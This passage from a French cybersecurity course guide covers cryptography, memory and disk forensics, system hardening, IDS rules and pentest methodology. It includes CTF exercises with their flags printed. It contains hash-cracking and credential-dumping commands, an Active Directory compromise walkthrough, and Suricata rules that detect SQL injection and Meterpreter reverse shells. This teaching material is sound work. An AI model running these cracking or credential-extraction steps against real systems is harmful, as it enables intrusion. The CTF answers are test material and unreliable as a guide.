RC4 40-2048 bits - Casse WEP (vuln), TLS < 1.2

Blowfish 32-448 bits CBC Obsolete bcrypt (KDF seulement)

Modes d'operation AES — Pourquoi le mode compte :


Mode Intergite Authentification Parallelisable A utiliser ?

ECB Non (patterns) Non Oui JAMAIS (patterns visibles)

CBC Oui (si IV ok) Non Dechiffrement Eviter (BEAST, padding oracle)

CTR Oui Non Oui Si MAC separe (HMAC)

GCM Oui (AEAD) Oui (tag 128b) Oui RECOMMANDE

CCM Oui (AEAD) Oui Non OK (IoT, embedded)

7.2 Chiffrement Asymetrique et PKI

- 41 -
CYBERSECURITE - GUIDE COMPLET

# === RSA — OPERATIONS DE BASE ===

# Generer une paire de cles RSA 4096 bits

openssl genrsa -out [Link] 4096

openssl genrsa -aes256 -out private_enc.pem 4096 # Chiffree avec passphrase

# Extraire la cle publique

openssl rsa -in [Link] -pubout -out [Link]

# Chiffrer avec cle publique / Dechiffrer avec cle privee

openssl pkeyutl -encrypt -inkey [Link] -pubin -in [Link] -out [Link]

openssl pkeyutl -decrypt -inkey [Link] -in [Link] -out [Link]

# Signer / Verifier

openssl dgst -sha256 -sign [Link] -out [Link] [Link]

openssl dgst -sha256 -verify [Link] -signature [Link] [Link]

# === ELLIPTIC CURVE (ECDSA / ECDH) ===

openssl ecparam -genkey -name prime256v1 -noout -out ec_private.pem

openssl ec -in ec_private.pem -pubout -out ec_public.pem

openssl ecparam -list_curves # Voir toutes les courbes disponibles

# === ANALYSER UN CERTIFICAT TLS ===

openssl s_client -connect [Link] -showcerts

openssl x509 -in [Link] -text -noout

openssl x509 -in [Link] -noout -dates # Dates validite

openssl x509 -in [Link] -noout -subject # Sujet

openssl x509 -in [Link] -noout -issuer # Emetteur

openssl x509 -in [Link] -noout -fingerprint # Empreinte

# Verifier la chaine de certificats

openssl verify -CAfile [Link] [Link]

# === HACHAGE ===

echo -n 'motdepasse' | md5sum # MD5 (CASSE — ne pas utiliser pour passwords)

echo -n 'motdepasse' | sha256sum # SHA-256

echo -n 'motdepasse' | sha512sum # SHA-512

openssl passwd -6 'motdepasse' # SHA-512 crypt (Linux /etc/shadow)

# === CRACKER DES HASHES ===

hashcat -m 0 [Link] [Link] # MD5

hashcat -m 100 [Link] [Link] # SHA1

hashcat -m 1800 [Link] [Link] # sha512crypt ($6$)

hashcat -m 1000 [Link] [Link] # NTLM

hashcat -m 5600 [Link] [Link] # NTLMv2

- 42 -
CYBERSECURITE - GUIDE COMPLET

john --wordlist=[Link] [Link] # John the Ripper

7.3 Techniques CTF Cryptographie


# === CAESAR / ROT — DECHIFFRAGE ===

python3 -c "

text = 'KHOOR ZRUOG'

for shift in range(26):

dec = ''.join(chr((ord(c)-65-shift)%26+65) if [Link]()

else chr((ord(c)-97-shift)%26+97) if [Link]()

else c for c in text)

print(f'ROT{shift:2d}: {dec}')"

# ROT13 rapide

echo 'Uryyb Jbeyq' | tr 'A-Za-z' 'N-ZA-Mn-za-m'

# === XOR ===

python3 -c "

ct = [Link]('1a2b3c4d5e') # ciphertext hex

key = b'key'

pt = bytes([c ^ key[i%len(key)] for i, c in enumerate(ct)])

print(pt)"

# === BASE ENCODINGS ===

echo 'Q1RGe2Jhc2U2NH0=' | base64 -d

echo '43544679626173653634' | xxd -r -p # Hex to ASCII

python3 -c "import base64; print(base64.b85decode('some_b85'))"

# === RSA FAIBLE — CTFTOOL ===

# Si n est petit ou si e est grand -> factorisation possible

python3 [Link] --publickey [Link] --private

python3 [Link] --publickey [Link] --uncipherfile [Link]

# Factoriser avec [Link] ou yafu

yafu 'factor(<n>)'

# === VIGENERE ===

# Trouver la longueur de cle avec l'indice de coincidence (IC)

# Kasiski test en ligne : [Link]/vigenere-cipher

# === CYBERCHEF — OUTIL WEB UNIVERSEL ===

# [Link]

# Operations chainables : Magic, From Base64, XOR, ROT13...

# 'Magic' detecte automatiquement les encodages

- 43 -
CYBERSECURITE - GUIDE COMPLET

CTF #07 - Crypto Maze


Scenario

Un message chiffre en plusieurs couches a ete intercepte. Chaque couche utilise un encodage ou
chiffrement different. Decouvert le flag cache au fond de la pile.

Objectifs

[1] Identifier le type d'encodage de la premiere couche (Base64 ?)

[2] Decoder chaque couche dans le bon ordre

[3] Identifier le chiffre de substitution (ROT ? Vigenere ?)

[4] Utiliser CyberChef pour chainer les operations

[5] Extraire le flag final

Outils suggeres

CyberChef ([Link] avec l'option 'Magic'

python3 pour les operations personnalisees

[Link] pour les chiffres classiques

Indice

Utilisez la fonction 'Magic' de CyberChef qui detecte automatiquement les couches d'encodage.

Format du flag

CTF{crypt0_l4y3r_by_l4y3r_d3c0d3d}

- 44 -
CYBERSECURITE - GUIDE COMPLET

MODULE 08

Forensique Numerique & Reponse


a Incident
Investiguer une compromission, analyser les artéfacts et reconstruire la chaine d'attaque. La
forensique numerique est le coeur du travail d'un analyste SOC et d'un intervenant DFIR.

OBJECTIFS DU MODULE

✓ Appliquer la methodologie de collecte de preuves (ordre de volatilite)

✓ Analyser un dump memoire avec Volatility 3

✓ Identifier les artefacts Windows forensiques cles

✓ Analyser des fichiers malveillants avec des outils statiques

✓ Rediger un rapport d'incident complet

8.1 Methodologie DFIR — Ordre de Volatilite


Priorite Source Volatilite Outils de collecte

1 Registres CPU / cache L1-L3 Tres haute Impossible a capturer (s'efface a l'extinction)

2 Memoire RAM Haute volatility, winpmem, avml, LiME (Linux)

3 Etat reseau / connexions Haute netstat, ss, tcpdump, Wireshark

4 Processus en cours Haute ps, tasklist, Process Hacker

5 Cache ARP / DNS Moyenne arp -a, ipconfig /displaydns

6 Disque dur (MFT, prefetch) Faible FTK Imager, dd, dcfldd, Autopsy

7 Logs systeme / applicatifs Faible Event Viewer, /var/log/, Splunk

8 Logs distants / SIEM Nulle Splunk, Elastic, Microsoft Sentinel

8.2 Acquisition de Memoire


# === LINUX — Acquisition memoire avec AVML ===

sudo ./avml /media/usb/[Link]

# LiME (module kernel)

sudo insmod [Link] 'path=/media/usb/[Link] format=lime'

# === WINDOWS — Acquisition avec WinPmem ===

winpmem_mini.exe [Link]

- 45 -
CYBERSECURITE - GUIDE COMPLET

# === CREATION D'UNE IMAGE DISQUE (dd) ===

sudo dd if=/dev/sda of=/media/usb/[Link] bs=4M status=progress

sudo dcfldd if=/dev/sda of=/media/usb/[Link] hash=md5 hashwindow=1G

# FTK Imager CLI

ftkimager /dev/sda /media/usb/acquisition --e01 --compress 6

# Verifier l'integrite (hash)

md5sum [Link] > [Link].md5

sha256sum [Link] > [Link].sha256

8.3 Volatility 3 — Reference Complete


# === INFORMATION GENERALE ===

vol3 -f [Link] [Link] # Infos OS, version, date

vol3 -f [Link] [Link] # Historique bash (Linux)

# === PROCESSUS ===

vol3 -f [Link] [Link] # Liste des processus (ordre PID)

vol3 -f [Link] [Link] # Arbre parent/enfant

vol3 -f [Link] [Link] # Scan structures EPROCESS (trouver process caches)

vol3 -f [Link] [Link] # Lignes de commande de chaque process

vol3 -f [Link] [Link] --pid 1234 # DLLs chargees par un process

# === RESEAU ===

vol3 -f [Link] [Link] # Connexions TCP/UDP actives

vol3 -f [Link] [Link] # Scan des structures reseau

# === CREDENTIALS ===

vol3 -f [Link] [Link] # Hashes NTLM (SAM)

vol3 -f [Link] [Link] # LSA secrets

vol3 -f [Link] [Link] # Hashes mis en cache

# === DETECTION MALWARE ===

vol3 -f [Link] [Link] # Injections de code (rwx sections)

vol3 -f [Link] [Link] # Services Windows (dont services caches)

vol3 -f [Link] [Link] # Drivers charges

vol3 -f [Link] [Link] # System Service Descriptor Table (hooking)

vol3 -f [Link] [Link] # Mutexes (IOC malware)

# === FICHIERS ET REGISTRE ===

vol3 -f [Link] [Link] # Tous les fichiers ouverts en memoire

vol3 -f [Link] [Link] --pid 1234 # Extraire fichiers d'un process

- 46 -
CYBERSECURITE - GUIDE COMPLET

vol3 -f [Link] [Link] --virtaddr 0xfffff... # Par adresse virtuelle

vol3 -f [Link] [Link] # Ruches de registre chargees

vol3 -f [Link] [Link] --key


'Software\Microsoft\Windows\CurrentVersion\Run'

# === LINUX SPECIFIQUE ===

vol3 -f [Link] [Link]

vol3 -f [Link] [Link]

vol3 -f [Link] [Link]

vol3 -f [Link] linux.check_creds # Verifier privileges root

8.4 Artefacts Windows Forensiques Cles


Artefact Localisation Information utile

Prefetch C:\Windows\Prefetch\*.pf Execution programmes, timestamps, frequence

Event Logs C:\Windows\System32\winevt\Logs\ 4624/25 login, 4688 process, 7045 service

Registry NTUSER C:\Users\<user>\[Link] MRU, Recent docs, UserAssist

Shimcache HKLM\SYSTEM\...\AppCompatCache Historique execution executables

Amcache C:\Windows\appcompat\Programs\[Link]
SHA1 hash des executables lances

LNK Files C:\Users\<user>\AppData\Roaming\... Fichiers recemment ouverts

Jumplists C:\Users\<user>\AppData\Roaming\... Applications et documents recents

MFT ($MFT) Racine NTFS Tous fichiers + timestamps MACB

Browser History AppData\Local\<browser>\User Data\ URLs visitees, downloads, cookies

PowerShell Logs HKLM\SOFTWARE\...\PowerShell\ ScriptBlockLogging (si active)

# === ANALYSE LOGS WINDOWS AVEC POWERSHELL ===

Get-WinEvent -LogName Security | Where-Object {$_.Id -eq 4624} | Select -First 20

Get-WinEvent -LogName Security | Where-Object {$_.Id -eq 4688} | Format-List

# === ANALYSE LOGS LINUX ===

# Connexions SSH reussies

grep 'Accepted password' /var/log/[Link] | tail -50

grep 'Accepted publickey' /var/log/[Link]

# Tentatives de brute force SSH

grep 'Failed password' /var/log/[Link] | awk '{print $11}' | sort | uniq -c | sort -rn |
head -20

# Commandes sudo

grep 'sudo:' /var/log/[Link]

# Connexions web Apache

- 47 -
CYBERSECURITE - GUIDE COMPLET

grep ' 200 ' /var/log/apache2/[Link] | awk '{print $1}' | sort | uniq -c | sort -rn

grep ' 500 ' /var/log/apache2/[Link]

# === ANALYSE MALWARE STATIQUE ===

file [Link] # Type de fichier

strings [Link] | grep -i 'http\|https\|cmd\|powershell'

strings [Link] | grep -E '[0-9]{1,3}\.[0-9]{1,3}' # IPs

exiftool [Link] # Metadonnees

md5sum [Link] && sha256sum [Link] # Hasher pour VT

# Analyse PE avec pecheck

[Link] [Link]

# Sandbox en ligne

# - VirusTotal : [Link]/gui/home/upload

# - [Link] : [Link]

# - Hybrid Analysis : [Link]

# - Cuckoo : self-hosted sandbox

CTF #08 - Incident Response


Scenario

Vous recevez un dump memoire Windows ([Link]) d'une machine suspecte. L'equipe SOC signale
des connexions sortantes anormales. Identifiez le processus malveillant, extrayez le payload et trouvez le
flag qu'il contient.

Objectifs

[1] Analyser le dump avec [Link] et [Link]

[2] Identifier le processus suspect (parent inhabituel, nom clone de svchost...)

[3] Verifier les connexions reseau ([Link])

[4] Utiliser [Link] pour trouver les injections

[5] Extraire le binaire suspect avec [Link]

[6] Analyser le binaire avec strings pour trouver le flag

Outils suggeres

vol3 -f [Link] [Link]

vol3 -f [Link] [Link] | head -50

vol3 -f [Link] [Link] --pid

strings | grep CTF

Indice

Un [Link] dont le parent n'est pas [Link] est presque toujours malveillant.

Format du flag

CTF{v0l4t1l1ty_m3m0ry_4n4lys1s_m4lw4r3_d3t3ct3d}

- 48 -
CYBERSECURITE - GUIDE COMPLET

- 49 -
CYBERSECURITE - GUIDE COMPLET

MODULE 09

Hardening & Defense Active


Passer du cote defensif : durcir les systemes, configurer les solutions de securite et mettre en place
une architecture Zero Trust.

OBJECTIFS DU MODULE

✓ Appliquer les CIS Benchmarks pour Linux et Windows

✓ Configurer iptables / nftables et Fail2Ban

✓ Deployer et configurer Snort/Suricata comme IDS/IPS

✓ Comprendre le modele Zero Trust et la micro-segmentation

✓ Analyser des logs avec un SIEM (Elastic Stack / Splunk)

9.1 Hardening Linux — CIS Benchmarks


# === AUDIT INITIAL AVEC LYNIS ===

sudo lynis audit system

sudo lynis audit system --quick # Sans confirmation

# Le rapport est dans /var/log/[Link]

# Score > 80 = bonne posture de securite

# === SECURISATION SSH (/etc/ssh/sshd_config) ===

Protocol 2 # SSH v2 uniquement

PermitRootLogin no # Desactiver login root direct

PasswordAuthentication no # Cles uniquement

PubkeyAuthentication yes

MaxAuthTries 3

LoginGraceTime 30

X11Forwarding no

AllowUsers deployuser adminuser # Whitelist utilisateurs

AllowGroups sshusers # Ou par groupe

Banner /etc/ssh/[Link] # Banniere legale

ClientAliveInterval 300

ClientAliveCountMax 2

# Redemarrer SSH

sudo systemctl restart sshd

- 50 -
CYBERSECURITE - GUIDE COMPLET

# === FAIL2BAN — BLOQUER LE BRUTE FORCE ===

sudo apt install fail2ban -y

# /etc/fail2ban/[Link]

[DEFAULT]

bantime = 3600

findtime = 600

maxretry = 3

[sshd]

enabled = true

port = 22

logpath = /var/log/[Link]

[apache-auth]

enabled = true

sudo systemctl enable --now fail2ban

sudo fail2ban-client status # Voir les bans

sudo fail2ban-client status sshd

# === PERMISSIONS ET SUID/SGID DANGEREUX ===

find / -perm -4000 -type f 2>/dev/null # Binaires SUID

find / -perm -2000 -type f 2>/dev/null # Binaires SGID

find / -writable -type d 2>/dev/null # Repertoires world-writable

find /etc -type f -perm /o+w 2>/dev/null # Fichiers /etc modifiables

# Supprimer SUID inutiles

chmod u-s /usr/bin/at

chmod u-s /usr/bin/wall

# === DESACTIVER SERVICES INUTILES ===

sudo systemctl disable --now avahi-daemon cups bluetooth rpcbind

sudo systemctl mask [Link] [Link] [Link]

# === AUDITD — AUDIT DES ACTIONS SYSTEME ===

sudo apt install auditd audispd-plugins

sudo auditctl -w /etc/passwd -p war -k password_changes

sudo auditctl -w /etc/sudoers -p rwa -k sudoers

sudo auditctl -a always,exit -F arch=b64 -S execve -k exec_commands

sudo ausearch -k password_changes # Rechercher evenements

9.2 Firewall avec iptables et nftables


# === IPTABLES — POLITIQUE RESTRICTIVE ===

- 51 -
CYBERSECURITE - GUIDE COMPLET

# Vider les regles existantes

sudo iptables -F && sudo iptables -X && sudo iptables -Z

# Politique par defaut : bloquer tout

sudo iptables -P INPUT DROP

sudo iptables -P FORWARD DROP

sudo iptables -P OUTPUT ACCEPT

# Autoriser loopback

sudo iptables -A INPUT -i lo -j ACCEPT

sudo iptables -A OUTPUT -o lo -j ACCEPT

# Autoriser connexions etablies et liees

sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

# Autoriser SSH depuis un reseau specifique seulement

sudo iptables -A INPUT -p tcp --dport 22 -s [Link]/24 -m state --state NEW -j ACCEPT

# Autoriser HTTP et HTTPS

sudo iptables -A INPUT -p tcp --dport 80 -m state --state NEW -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 443 -m state --state NEW -j ACCEPT

# Limiter les tentatives de connexion SSH (anti-brute force)

sudo iptables -A INPUT -p tcp --dport 22 -m recent --set --name SSH

sudo iptables -A INPUT -p tcp --dport 22 -m recent --update --seconds 60 --hitcount 4


--name SSH -j DROP

# Logger et rejeter le reste

sudo iptables -A INPUT -m limit --limit 5/min -j LOG --log-prefix 'IPTABLES-DROP: '

sudo iptables -A INPUT -j DROP

# Sauvegarder les regles

sudo iptables-save > /etc/iptables/rules.v4

sudo apt install iptables-persistent

# === NFTABLES (successeur iptables) ===

sudo apt install nftables

sudo nft list ruleset

sudo nft add table inet filter

sudo nft add chain inet filter input { type filter hook input priority 0\; policy drop\; }

sudo nft add rule inet filter input ct state established,related accept

sudo nft add rule inet filter input tcp dport 22 ip saddr [Link]/24 accept

9.3 Snort/Suricata — IDS/IPS

- 52 -
CYBERSECURITE - GUIDE COMPLET

# === INSTALLATION SURICATA ===

sudo apt install suricata -y

sudo suricata-update # Mettre a jour les regles

sudo suricata-update list-sources # Voir les sources de regles

# Lancer en mode IDS sur une interface

sudo suricata -c /etc/suricata/[Link] -i eth0

# Analyser un fichier pcap

sudo suricata -r [Link] -l /var/log/suricata/

# Voir les alertes

cat /var/log/suricata/[Link]

jq . /var/log/suricata/[Link] | less

# === ECRIRE UNE REGLE SURICATA ===

# /etc/suricata/rules/[Link]

# Detecter une scan Nmap SYN

alert tcp any any -> $HOME_NET any (msg:'SCAN Nmap SYN';

flags:S; threshold: type both, track by_src, count 20, seconds 1;

sid:1000001; rev:1;)

# Detecter SQLi basique

alert http any any -> $HTTP_SERVERS any (msg:'SQL Injection Attempt';

content:"' OR "; nocase; http_client_body;

sid:1000002; rev:1;)

# Detecter connexion DNS vers domaine suspect

alert dns any any -> any 53 (msg:'DNS Query to suspicious domain';

[Link]; content:"malware.c2"; nocase;

sid:1000003; rev:1;)

# Detecter Meterpreter reverse TCP

alert tcp $HOME_NET any -> any 4444 (msg:'Possible Meterpreter Reverse TCP';

flags:S; sid:1000004; rev:1;)

CTF #09 - Blue Team Defense


Scenario

Vous recevez [Link] et [Link] d'un serveur compromise. Identifiez l'attaque, l'attaquant, et ecrivez
les regles de detection.

Objectifs

[1] Analyser [Link] pour trouver le brute force SSH (IP, timestamps, nb tentatives)

- 53 -
CYBERSECURITE - GUIDE COMPLET

[2] Identifier l'IP ayant reussi a se connecter

[3] Analyser [Link] pour trouver les payloads SQLi ou traversee de chemin

[4] Ecrire une regle fail2ban pour bloquer le brute force

[5] Ecrire une regle Suricata pour detecter les tentatives SQLi

[6] Calculer le score CVSS de la vulnerabilite exploitee

Outils suggeres

grep 'Failed password' [Link] | awk '{print $11}' | sort | uniq -c | sort -rn

grep 'Accepted' [Link]

grep -E "('|union|select|drop)" [Link] -i

Indice

Cherchez une IP avec 100+ echecs puis 1 succes. C'est le signe d'un brute force reussi.

Format du flag

CTF{bl43_t34m_d3f3nd3r_l0g_4n4lys1s_pr0}

- 54 -
CYBERSECURITE - GUIDE COMPLET

MODULE 10

Strategies CTF & Methodologie


Pentest
Consolider l'ensemble des acquis, maitriser la methodologie pentest professionnelle et developper
des strategies efficaces pour les competitions CTF.

OBJECTIFS DU MODULE

✓ Maitriser la methodologie pentest PTES/OSSTMM de bout en bout

✓ Developper une strategie CTF par categorie

✓ Rediger un rapport de pentest professionnel

✓ Connaitre les plateformes de pratique et certifications cles

✓ Construire son lab personnel de cybersecurite

10.1 Methodologie Pentest Professionnelle


Phase Nom Livrables Outils / Techniques

1 Pre-engagement Contrat, scope, RoE signes Templates, checklists legales

2 Reconnaissance Rapport OSINT, cartographie surface Nmap, Shodan, theHarvester

3 Enumeration Services, versions, utilisateurs Nmap -sV -sC, enum4linux

4 Vuln Analysis Liste CVE + CVSS + validation OpenVAS, Nessus, searchsploit

5 Exploitation Preuves d'acces (screenshots, files) Metasploit, exploits manuels

6 Post-Exploitation Scope de l'impact reel Meterpreter, mimikatz, pivot

7 Lateral Movement Cartographie du reseau interne BloodHound, impacket

8 Persistence Preuves de persistance (desactivee) Taches planifiees, cles SSH

9 Couverture traces Logs nettoyes (en lab uniquement) Clearev meterpreter

10 Rapport Executive Summary + Technical Report


Dradis, Word, LaTeX

10.2 Structure d'un Rapport de Pentest


# === EXECUTIVE SUMMARY (1-2 pages) ===

- Contexte et objectifs de la mission

- Dates et perimetre teste

- Synthese des vulnerabilites : X Critiques, Y Elevees, Z Moyennes

- 55 -
CYBERSECURITE - GUIDE COMPLET

- Top 3 des risques les plus importants (non-technique)

- Score de risque global (ex: 8.2/10)

- Recommandations prioritaires

# === RESUME DES VULNERABILITES ===

Tableau de toutes les CVE avec : CVE-ID, Titre, CVSS, Systeme affecte,

Statut (Ouvert / Corrige), Priorite (P1 Critique / P2 Elevee / P3 Moyenne)

# === DETAILS TECHNIQUES (une section par vuln) ===

Pour chaque vulnerabilite :

- Titre : ex: 'MS17-010 EternalBlue - RCE sans authentification'

- CVE et score CVSS

- Systeme(s) affecte(s) : IP, hostname, OS

- Description technique

- Preuve d'exploitation (screenshot, output commande)

- Impact potentiel (confidentialite, integrite, disponibilite)

- Recommandation de correction specifique

- References (CVE, articles, patches officiels)

# === ANNEXES ===

- Scope complet (IPs testees)

- Logs et outputs bruts des outils

- Timeline des activites

- Methodologie utilisee (PTES, OSSTMM, OWASP)

10.3 Strategies CTF par Categorie


Categorie Workflow recommande Outils essentiels

Web Enumerer -> Tester OWASP Top 10 -> SQLi Burp


-> XSS
Suite, sqlmap, ffuf, Nikto

Pwn (Binaire) checksec -> trouver vuln -> exploiter avec pwntools
GDB+peda/pwndbg, pwntools, ROPgadget

Reverse Engg file -> strings -> desassembler -> comprendreGhidra,


logiqueIDA Free, radare2, ltrace

Cryptographie Identifier algo -> chercher faiblesse -> casserCyberChef, RsaCtfTool, hashcat, sage

Forensique Binwalk -> Volatility -> Autopsy -> Strings Volatility, Autopsy, binwalk, foremost

OSINT Domaine -> WHOIS -> DNS -> Reseaux sociaux


Maltego, Shodan, theHarvester

Steganographie Analyser metadata -> lsb -> frequences steghide, stegsolve, zsteg, exiftool

Reseau (pcap) Protocol hierarchy -> Follow streams -> Decode


Wireshark, tshark, NetworkMiner

Misc Identifier le type -> CyberChef -> creer script CyberChef, Python, Cyberchef

10.4 Construire son Lab Personnel

- 56 -
CYBERSECURITE - GUIDE COMPLET

# === OPTION 1 : LAB LOCAL (VirtualBox / VMware) ===

# Machines recommandees :

- Kali Linux (attaquant) : derniere version officielle

- Metasploitable 2 ou 3 : cibles Linux/Windows vulnerables

- VulnHub machines : download gratuit sur [Link]

- Windows Server 2019 eval : 180 jours gratuits (Microsoft)

# Configuration reseau recommandee :

- NAT Network : acces internet depuis toutes les VMs

- Host-Only : reseau isole pour les attaques (aucune fuite)

- Carte 2 : bridged (optionnel, pour labs avances)

# === OPTION 2 : PROXMOX (lab serveur dedie) ===

# Proxmox VE gratuit sur vieux PC (8GB RAM minimum)

# Creer des VMs et snapshots facilement

# Accessible via browser depuis le reseau local

# === OPTION 3 : CLOUD (AWS/Azure/VPS) ===

# AWS Free Tier : EC2 [Link]

# Attention : scanner des IPs sans autorisation = illegal meme en cloud

# Utiliser VPCs prives et security groups restrictifs

# === PLATEFORMES EN LIGNE (recommandees) ===

TryHackMe : [Link] (debutant - guide)

HackTheBox : [Link] (intermediaire/avance)

PicoCTF : [Link] (CTF educatif permanent)

CTFtime : [Link] (calendrier CTF mondiaux)

VulnHub : [Link] (machines a download)

PortSwigger Academy : [Link]/web-security (web gratuit)

OWASP WebGoat : local Docker (app web vulnérable guidee)

DVWA : local Docker (Damn Vulnerable Web App)

10.5 Certifications Recommandees


Certification Organisme Niveau Type Cout approx.

CompTIA Security+ CompTIA Debutant QCM 400 USD

eJPT eLearnSecurity Debutant Pratique 200 USD

CEH EC-Council Intermediaire QCM+Lab 1100 USD

PNPT TCM Security Intermediaire Pratique 5j 400 USD

OSCP Offensive Sec. Avance Pratique 24h 1499 USD

- 57 -
CYBERSECURITE - GUIDE COMPLET

CRTO Zero-Point Sec. Avance Lab 4j 400 GBP

CRTE Altered Security Expert Lab AD 249 USD

CISSP ISC2 Expert QCM adaptatif 699 USD

CISM ISACA Expert QCM 575 USD

CTF #10 - Full Chain Attack


Scenario

Challenge final integrant tous les modules. Une infrastructure lab complete (serveur web + base de
donnees + domaine Windows AD) est disponible. Obtenez le flag administrateur de domaine.

Objectifs

[1] Reconnaissance complete (Nmap + sous-domaines + OSINT)

[2] Exploitation web (SQLi ou RCE sur l'appli web exposee)

[3] Elevation de privileges locale sur le serveur web

[4] Pivot vers le reseau interne (autoroute + socks)

[5] Enumeration Active Directory (BloodHound / ldapdomaindump)

[6] Compromission DC (Kerberoasting, Pass-the-Hash ou zerologon)

[7] Extraire le flag dans \\DC\flags\[Link]

[8] Ecrire un mini Executive Summary de 10 lignes

Outils suggeres

nmap -> gobuster -> sqlmap -> msfconsole

impacket-GetUserSPNs + hashcat (Kerberoasting)

BloodHound + SharpHound pour la cartographie AD

Indice

BloodHound visualise les chemins d'attaque vers Domain Admin. Cherchez les ACL abusables.

Format du flag

CTF{full_ch41n_d0m41n_4dm1n_0wn3d_gr34t_w0rk}

- 58 -
CYBERSECURITE - GUIDE COMPLET

FIN DU GUIDE — BONNE CHANCE !


Vous avez parcouru 10 modules couvrant l'integralite du spectre de la cybersecurite offensive et
defensive. Des fondations reseau jusqu'a la compromission d'un domaine Active Directory, en passant par
la forensique et le durcissement des systemes.

Hack legally. Learn continuously. Defend actively.

- 59 -

Vous aimerez peut-être aussi